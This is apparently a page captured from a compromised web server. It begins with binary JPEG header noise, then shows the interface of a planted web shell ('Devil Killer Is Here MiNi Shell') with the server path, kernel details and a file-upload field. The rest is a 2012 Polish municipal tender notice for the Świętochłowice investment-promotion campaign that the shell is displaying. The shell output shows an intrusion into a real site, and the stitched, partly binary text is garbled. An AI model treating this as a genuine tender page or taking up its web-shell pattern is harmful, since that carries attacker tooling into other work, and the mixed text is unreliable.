JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120227/57666-N-2012.html

<p class="kh_header"><b>Świętochłowice: Przygotowanie i przeprowadzenie kompleksowej kampanii reklamowej terenów inwestycyjnych Miasta Świętochłowice pn.: Świętochłowice. Bliżej niż myślisz - Promocja terenów inwestycyjnych miasta.</b><br>
<b>Numer ogłoszenia: 57666 - 2012; data zamieszczenia: 27.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kompleksowej kampanii reklamowej terenów inwestycyjnych Miasta Świętochłowice pn.: Świętochłowice. Bliżej niż myślisz - Promocja terenów inwestycyjnych miasta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaplanowanie i przeprowadzenie kampanii promującej tereny inwestycyjne Miasta Świętochłowice ,  w powiązaniu z Księgą identyfikacji wizualnej znaku Świętochłowice. Bliżej niż myślisz.
Kampania powinna łączyć działania informacyjne o mieście, jego lokalizacji, idei bliskości w sensie przestrzennym i przenośnym zawartej w haśle promocyjnym miasta, jego potencjale. Celem kampanii jest zainteresowanie przedsiębiorców ofertą  inwestycyjną miasta. Grupą docelową kampanii są głównie inwestorzy krajowi i zagraniczni, przedstawiciele firm consultingowych branży inwestycyjnej, a także deweloperzy, doradcy biznesowi, przedstawiciele instytucji otoczenia biznesu, turyści biznesowi. 
Przekazy na wszystkich materiałach muszą odpowiadać aktualnym wymaganiom w zakresie informacji i promocji projektu współfinansowanego ze środków Unii Europejskiej: muszą więc zawierać odpowiednie znaki graficzne z odwołaniem słownym do Unii Europejskiej, Europejskiego Funduszu Rozwoju Regionalnego i Programu Operacyjnego oraz zapis Kampania finansowana przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.

Zamawiający podzielił przedmiot zamówienia  na trzy zadania:  
1.Zadanie 1  Przygotowanie i wykonanie prezentacji multimedialnej i folderów promocyjnych.  
2.Zadanie 2  Organizacja dla 50 osób łącznie dwóch wizyt biznesowych w Świętochłowicach, tzw. study tour, prezentujących wskazane tereny inwestycyjne i potencjał miasta.
3.Zadanie 3 Przeprowadzenie kampanii promocyjnej w portach lotniczych, na portalach internetowych, billboardach, w siedzibach placówek dyplomatycznych.

Zadanie 1 Przygotowanie i wykonanie prezentacji multimedialnej i folderów promocyjnych.  
Zadanie obejmuje przygotowanie i wykonanie prezentacji multimedialnej w formie spotu  reklamowego wraz z tłumaczeniem na 3 języki obce ( angielski, francuski, niemiecki ) i systematyczną aktualizacją do grudnia 2013 r., oraz przygotowanie i wykonanie folderów promocyjnych wraz z tłumaczeniem na 3 języki obce ( angielski, francuski, niemiecki ).
W ramach przedmiotowego zadania Wykonawca zobowiązany jest do 
1.Wykonania i powielenia w ilości 100 sztuk prezentacji multimedialnej w formie spotu reklamowego wraz z tłumaczeniem na 3 języki obce (angielski, niemiecki, francuski) i systematyczną aktualizacją do grudnia 2013 r. na płycie DVD, wytłoczonej wraz z nadrukiem w pełnym kolorze. Pudełka Digipack A5 jednołamowe 4P, jedna tacka na płytę, karton 250-300g, nadruk w pełnym kolorze, foliowanie błyszczące, lakier punktowy UV. 
30 sekundowy spot reklamowy musi spełniać wszystkie wymogi techniczne telewizji ogólnopolskiej - format HD i SD z muzyką i dźwiękiem dolby digital (5.1).
Z chwilą przekazania spotu przez Wykonawcę staje się on własnością  Zamawiającego  bez konieczności zapłaty dodatkowego wynagrodzenia. Wykonawca zobowiązuje się do przeniesienia na Zamawiającego  autorskich praw majątkowych do przedmiotu zamówienia na wszelkich polach eksploatacji, w tym utrwalania, zapisu, zwielokrotniania, sporządzania kopii dowolną techniką, upubliczniania w internecie i innej sieci komputerowej, odtwarzania, reemitowania w różnych formach.
Spot powinien zawierać informacje w postaci zestawu znaków graficznych dotyczących dofinansowania projektu z Unii Europejskiej, zgodnie z aktualnie obowiązującą instrukcją zamieszczoną w Wytycznych Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, która dostępna jest na stronie internetowej www.rpo.slaskie.pl
Wykonawca przedstawi do akceptacji Zamawiającego szczegółowy scenariusz spotu oraz graficzny projekt okładki i płyty DVD .
Zawartość płyty:
-autostart z opcją wyboru wersji językowej (polska  angielska niemiecka  francuska)
-interaktywne menu z wyborem 3 bloków tematycznych: 
a) Świętochłowice  - prezentacja miasta (m.in. położenie, mapa połączeń kolejowych, drogowych, lotniczych, pokazująca odległości, czas przejazdu, potencjał mieszkańców miasta, województwa, regionu, informacje demograficzne i statystyczne pokazujące potencjał gospodarczy miasta, informacje o wydarzeniach kulturalnych, kalendarium cyklicznych imprez, galeria zdjęć )
b) Oferta inwestycyjna - m.in. dane statystyczne, mapki, zdjęcia i opisy dotyczące infrastruktury miasta, planów jego zagospodarowania, interaktywna mapa terenów inwestycyjnych z możliwością wyboru danej działki i przejścia do jej szczegółowego opisu,
c) Multimedia zawierające spot promocyjny miasta Świętochłowice.
2.Zaprojektowania i wykonania folderu promocyjnego wraz z tłumaczeniem na 3 języki (wersja polsko-angielsko-niemiecko-francuska), zawierającego prezentację potencjału gospodarczego miasta (tekst, tabele, zdjęcia, wykresy),  8 stron formatu B5, nakład 15.000 sztuk - gramatura papieru: okładka 250 g/m2, środek 170 g/m2, kolorystyka: okładka 4+4, środek 4+4, uszlachetnianie: folia matowa+UV, inne: zszywany, okładka punktowo lakierowana. Oferta w tym zakresie obejmuje: projekt graficzny, wykonanie 20 zdjęć miasta, skład, tłumaczenie, korekty, druk, dostawę do siedziby Zamawiającego.
3.Zaprojektowania i wykonania wkładek do folderu dla dziesięciu terenów inwestycyjnych. Wkładka powinna zawierać mapkę oraz podstawowe informacje dotyczące oferty inwestycyjnej. Format wkładki: A5, nakład: 75.000 sztuk (5 dwustronnych kart dla jednego folderu w wersji polsko-angielskiej ), gramatura papieru: papier kredowy matowy 170g m2, kolorystyka: 4+4, punktowe lakierowanie. 
Koncepcja folderu oraz wkładki powinna być spójna z prezentacją multimedialną oferty inwestycyjnej.
Zaprojektowane materiały promocyjne Wykonawca przekaże Zamawiającemu wraz z gotowymi materiałami promocyjnymi.

Zadanie 2 Organizacja dla 50 osób łącznie dwóch wizyt biznesowych w Świętochłowicach, tzw. study tour, prezentujących wskazane tereny inwestycyjne i potencjał miasta.

Zadanie obejmuje organizację 2 wizyt biznesowych, tzw. study tours w Świętochłowicach. Uczestnikami study tour mają być m. in. krajowi i zagraniczni inwestorzy, deweloperzy, architekci, attachés handlowi ambasad, przedstawiciele izb gospodarczych i regionalnych biur obsługi inwestora, szefowie działów firm odpowiedzialnych za ekspansję, dziennikarze, pracownicy firm consultingowych z branży inwestycyjnej. Wizyty biznesowe zostaną zorganizowane w czerwcu 2012 r. i w czerwcu 2013 r. Planuje się zaproszenie 
łącznie  50 osób w dwóch etapach  imprezy (nie mniej niż 20 osób w jednym etapie). 
W ramach przedmiotowego zadania Wykonawca zobowiązany jest do 
1.Zorganizowania zakwaterowania uczestników wizyt biznesowych w hotelu. 
Zakwaterowanie zaproszonych gości 2 noclegi ze śniadaniem oraz ekspertów biorących udział w konferencji w pokojach jednoosobowych, w jednym hotelu  o standardzie co najmniej 3-gwiazdkowym wraz z miejscem parkingowym, zlokalizowanym w odległości maksymalnie 15 min. dojazdu do Świętochłowic. 
2.Zorganizowania transportu uczestników w czasie trwania study tour.
Transport autokarem klasy LUX z nagłośnieniem i mikrofonem dla gości (łącznie 50 osób) na cały czas trwania study tour.
3. Zorganizowania przejazdu rikszami w ilości min. 10 szt. , po ścieżce rowerowej na terenie Ośrodka Sportu i Rekreacji Skałka.
4.Zorganizowania konferencji, spotkania plenerowego, spotkań władz miasta z inwestorami, środowiskami gospodarczymi, przedstawicielami instytucji otoczenia biznesu, dziennikarzami itd.
Konferencja ma zostać zorganizowana w Centrum Integracji Społecznej (CIS) w Świętochłowicach - Lipinach 
z inwestorami, środowiskami gospodarczymi, przedstawicielami instytucji otoczenia biznesu, dziennikarzami itd. z wykorzystaniem przygotowanych materiałów promocyjnych, wchodzących w zakres zadania nr 1 niniejszego zamówienia. 
Spotkanie plenerowe powinno odbyć się w 2 namiotach o powierzchni min. 150 m2 każdy. W jednym z nich podany będzie aperitif, w drugim  obiad.  Dodatkowo powinien być zabezpieczony trzeci namiot o powierzchni min. 100 m2  dla organizatorów, przedstawicieli mediów obsługujących imprezę  oraz osób towarzyszących. 
We wszystkich namiotach należy zapewnić  uczestnikom miejsca siedzące. 
Podczas spotkana plenerowego na terenie inwestycyjnym przy ul. Uroczysko Wykonawca  powinien zapewnić wzlot balonem na uwięzi na wysokość ok. 50 m. Balon powinien jednorazowo zabrać do góry min. 12 osób i umożliwiać skorzystanie z tej atrakcji wszystkim uczestnikom study tour. Powłoka balonu musi być oznaczona odpowiedniej wielkości logotypem i hasłem promocyjnym miasta.  
Spotkania władz miasta z inwestorami, środowiskami gospodarczymi, przedstawicielami instytucji otoczenia biznesu, dziennikarzami itd. z wykorzystaniem przygotowanych materiałów promocyjnych, wchodzących w zakres zadania nr 1 niniejszego zamówienia. 
5. Zapewnienia  wyżywienia uczestników.
Przygotowanie posiłków dla uczestników study tour.  
Obiad powinien składać się z aperitifu i dwóch dań. 
-aperitif: napoje alkoholowe wraz z przekąskami (orzeszki ziemne, pistacje, chipsy itp.)
-obiad, tradycyjny śląski: rosół z makaronem, kluski śląskie, ziemniaki, rolada wołowa, czerwona kapusta, biała kapusta, kawa, herbata, piwo, wino, tradycyjny śląski kołocz, ciasto, owoce. 
Wykonawca powinien uwzględnić indywidualne życzenia gości dot. menu oraz zabezpieczyć posiłki dla organizatorów, przedstawicieli mediów obsługujących imprezę oraz osób towarzyszących. Obiad podany będzie na terenie inwestycyjnym w rejonie ul. Uroczysko. Kolacje podawane będą w pensjonacie Willa Styl (pierwszy dzień) oraz restauracji Skałka (drugi dzień). Usługa cateringowa będzie realizowana w przerwie konferencji w CIS oraz w trakcie realizacji programu atrakcji w trzecim dniu wizyty biznesowej. 
6.Ubezpieczenia uczestników. 
Wykonawca zapewnia ubezpieczenie wszystkich uczestników wizyty biznesowej od następstw nieszczęśliwych wypadków.  
7. Zabezpieczenia odpowiedniego personelu
a) koordynatora study tour odpowiedzialnego za przebieg całej wizyty biznesowej, od przybycia gości do hotelu do momentu ich wyjazdu, będącego w stałym kontakcie z Zamawiającym,
b) moderatora do prowadzenia konferencji (w tej roli powinna wystąpić znana postać, np. dziennikarz działu serwisów biznesowych TV lub znany i ceniony fachowiec z dziedziny ekonomii),
c) tłumaczy symultanicznych w trakcie trwania konferencji (dyskusja winna być tłumaczona na języki obce - w zależności od potrzeb) oraz tłumaczy zapewniających sprawną obsługę gości w czasie całej wizyty. 
d) kelnerów i 4 hostessy do obsługi gości podczas obiadu plenerowego - znających w stopniu komunikatywnym język angielski,
e) ochrony spotkania plenerowego przez czterech członków agencji ochroniarskiej,
f) służb technicznych do obsługi nagłośnienia, 
g) zespołu smyczkowego, grającego w czasie oczekiwania na wzlot balonem i obiadu plenerowego.   
8. Zapewnienie atrakcji dla uczestników wizyt biznesowych m.in. w formie gry w paintball, przejazdu samochodami offroadowymi, quadami oraz zorganizowanie profesjonalnego pokazu fireshow - tańca z ogniem. 
Należy również przygotować ofertę alternatywną w razie złej pogody.
9.Pozostałe wymagania 					 
a) uzgodnienie listy gości i wysłanie zaproszeń do potencjalnych uczestników wraz z programem pobytu,
b) przygotowanie identyfikatorów dla wszystkich uczestników wizyty (gospodarzy i gości) oraz pakietu dla inwestora, zawierającego m. in. materiały wykonane w ramach zadania nr 1,
c) wykonanie dokumentacji fotograficznej w wysokiej rozdzielczości oraz relacji filmowej w jakości HD (ok. 10 min.) z przebiegu każdej wizyty biznesowej, 
d) przygotowanie alternatywnego rozwiązania dla elementów programu wrażliwych na warunki atmosferyczne (np. ulewny deszcz, zbyt silny wiatr uniemożliwiający wzniesienie balonem itp.),
e) zapewnienie agregatu prądotwórczego i zaplecza sanitarnego w czasie plenerowego obiadu oraz podczas realizacji programu atrakcji dla gości biznesowych w ramach czasu wolnego,
f) zapewnienie sprzętu technicznego - dwa laptopy, dwa telewizory o przekątnej min. 60 do wyświetlania spotu reklamowego, nagłośnienie,
g) zapewnienie kabin tłumaczeniowych wraz z niezbędnym oprzyrządowaniem,
h) przygotowanie formularza ankiety oceniającej wizytę biznesową, w tym m. in.  przydatność przekazanych w trakcie wizyty wiadomości, organizację wizyty biznesowej, poziom świadczenia usługi przez Wykonawcę (moderator, tłumacze, hotel, atrakcje, wyżywienie itp.).

Zadanie 3 Przeprowadzenie kampanii promocyjnej w portach lotniczych, na portalach internetowych, billboardach, w siedzibach placówek dyplomatycznych.

Zadanie obejmuje przeprowadzenie kampanii promocyjnej w portach lotniczych, na portalach internetowych, billboardach, w siedzibach placówek dyplomatycznych. 
W ramach przedmiotowego zadania Wykonawca zobowiązany jest do :
1. Zapewnienia  reklamy terenów inwestycyjnych Miasta Świętochłowice  w portach lotniczych  Katowice - Pyrzowice oraz  Kraków - Balice w okresie  od 1 czerwca 2012 do 31 grudnia 2012, nieprzerwanie, w ciągu 7 kolejnych pełnych miesięcy kalendarzowych. Reklama terenów inwestycyjnych ma być  umieszczona na wózkach bagażowych oraz tablicach - modułach informacyjno reklamowych wg poniższego schematu  ;
a) Port lotniczy Katowice - Pyrzowice 
-wózki bagażowe - 200 sztuk - reklama - tablica dwustronna, prostokątna  umocowana trwale do wózka o wymiarach nie mniejszych niż: przód 52x26 cm, tył 52x30 cm
-reklama statyczna w formie 1 sztuki banera ściennego niepodświetlanego  o rozmiarze nie mniejszym niż 500x 300 cm, umieszczona wewnątrz terminala pasażerskiego B.
b) Port lotniczy Kraków - Balice
-wózki bagażowe - 300 sztuk - reklama - tablica prostokątna umocowana trwale do wózka o wymiarach nie mniejszych niż: 50x40 cm
-reklama statyczna w formie 1 sztuki banera na ścianie z piaskowca ulokowanego w terminalu w części ogólnodostępnej o wymiarach nie mniejszych niż 200x460 cm. 
Termin realizacji zadania dotyczy wszystkich wymieniowych wyżej nośników. 
Wykonawca ponosi wszelkie ewentualne koszty wykonania, montażu i demontażu nośników. Reklama umieszczona w portach lotniczych musi być spójna z ogólną koncepcją zadania. Zamawiający zastrzega sobie prawo do akceptacji projektów reklam.
2.Wynajęcia 10 tablic promocyjno - informacyjnych,  montaż  na 10 wskazanych przez Zamawiającego terenach inwestycyjnych ulokowanych na terenie miasta Świętochłowice z zastrzeżeniem, iż jedna tablica jest przypisana do jednego terenu. Tablica musi zostać wykonana z materiału wodo  i mrozoodpornego, nierdzewnego oraz odpornego na wszelkie inne formy korozji, co najmniej przez okres do 31.12.2013. 
Na tablicach Wykonawca  jest zobowiązany umieścić dane charakteryzujące teren, uzgodnione z Zamawiającym oraz opisy zgodne z wytycznymi w sprawie  promocji projektu. Tablica zostanie na trwale związana  z gruntem  jednak konkretne miejsce umieszczenia musi uzyskać akceptację Zamawiającego. Tablica musi mieć kształt prostokąta o wymiarach nie mniejszych niż 200X300 cm. Wykonawca  uzyska wszelkie wymagane zezwolenia i uzgodnienia przewidziane odrębnymi przepisami prawa budowlanego i poniesie wszelkie ewentualne opłaty związane z uzyskaniem tych uzgodnień. Wygląd tablic musi być spójny z ogólną koncepcją zadania, a projekty tablic powinny uzyskać akceptację Zamawiającego.  
3.Przeprowadzenia  kampanii informacyjnej poprzez umieszczenie reklam promujących ofertę inwestycyjną miasta w terminie od 1 czerwca 2012 r. do 31 grudnia 2013 r.  lub do wyczerpania odsłon na następujących portalach internetowych wg poniższego schematu:  
-portal Onet.pl (www.biznes.onet.pl) - 100.000 odsłon, emisja na stronie głównej, reklama typu triple billboard - w liczbie 2 kampanii.
-portal WP.pl (www.wp.pl) - 1.000.000 odsłon, emisja na stronie głównej, reklama typu double billboard - w liczbie 2 kampanii. 
-portal Rzeczpospolita (www.rp.pl) - 100.000 odsłon, emisja na stronie głównej, reklama typu double billboard - w liczbie 2 kampanii. 
-portal Gazeta Wyborcza (www.wyborcza.pl) - 100.000 odsłon, emisja na stronie głównej, reklama typu double billboard - pakiet premium, w liczbie 2 kampanii. 
Poprzez pojęcie kampanii rozumie się liczbę odsłon w danym portalu. Poszczególne kampanie należy przeprowadzić osobno w poszczególnych, kolejno następujących po sobie kwartałach lat 2012 i 2013 i pojedynczo tylko w jednym portalu. Jedynie raz, w jednym kwartale dopuszcza się możliwość poprowadzenia kampanii równolegle na dwóch portalach. Wykonawca  przygotuje projekty i wykona materiał do umieszczenia w portalu. Zamawiający zastrzega sobie prawo do akceptacji projektów reklam.
Kampania informacyjna prowadzona w powyższych portalach musi się charakteryzować następującymi cechami
-musi posiadać przekierowanie do strony internetowej www.swietochlowice.pl, 
-musi być przygotowana w wersji Flash. 
Wykonawca  udokumentuje poprzez zrzut z ekranu pojawienie się reklam na wszystkich w/w portalach i liczbę odsłon. Reklama umieszczona w portalach internetowych musi być spójna z ogólną koncepcją zadania. 
3.Umieszczenia folderów  promujących oferty inwestycyjne, wykonane w ramach  zamówienia  w ambasadzie i przedstawicielstwach dyplomatycznych Chińskiej Republiki Ludowej i Republiki Indii w RP.

W ramach całości zamówienia Wykonawca zobowiązany jest do wykonania  i montażu  dwóch tablic  informacyjno  - pamiątkowych w budynku Urzędu Miejskiego.
Zamawiający wymaga od Wykonawcy udziela gwarancji jakości na wszystkie elementy wchodzące w zakres zamówienia objętego specyfikacją istotnych warunków zamówienia 
a) tablice informacyjne - na czas realizacji projektu, tj. 19 miesięcy.
b) tablice pamiątkowe - na okres trwałości projektu, tj. 5 lat.
c) tablice reklamowe na wózkach bagażowych i banery w portach lotniczych - na okres 7 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.14.00-0, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca  zobowiązany jest do wniesienia wadium w   wysokości 
14.000zł ( czternaścietysięcyzłotych). Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116,
poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wykonawca sam wybiera sobie formę wniesienia wadium. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miejskiego w Świętochłowicach ING Bank Śląski S.A. Katowice O Świętochłowice : 54 1050 1373 1000 0022 8149 7178  z dopiskiem :
Kampania reklamowa Miasta Świętochłowice  
Wadium musi znaleźć się na koncie Zamawiającego do dnia 8.03.2012 r.  do godz. 10:00. 
Kserokopię polecenia przelewu potwierdzoną za zgodność z oryginałem przez Wykonawcę należy dołączyć do oferty.
Wadium wniesione w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii plecenia przelewu wystawionego przez wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę. 
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w Urzędzie Miejskim w  Świętochłowicach, ul. Katowicka 54, w kasie parter pok. 123, a kserokopię wniesienia wadium potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu wykonawcy dołączyć do oferty.
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
Zamawiający dokona zwrotu wadium w przypadkach określonych w art. 46 ustawy Zamawiający na  pisemny wniosek wykonawcy zwróci wadium w przypadku wycofania oferty przed upływem terminu składania ofert,
Zgodnie z art. 46 ust. 5 ustawy Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego wyłącznie wtedy gdy:
-odmówi podpisania umowy na warunkach określonych w ofercie,
-wykonawca nie wniesie zabezpieczenia należytego wykonania umowy na zasadach określonych  w specyfikacji istotnych warunków zamówienia,
-zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.   
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy 
lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia Wykonawca musi wykazać, iż w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  co najmniej 2 usługi marketingowe, polegające na przeprowadzeniu kampanii promocyjnej o wartość 500.000zł brutto każda z przeprowadzonych kampanii.</p>
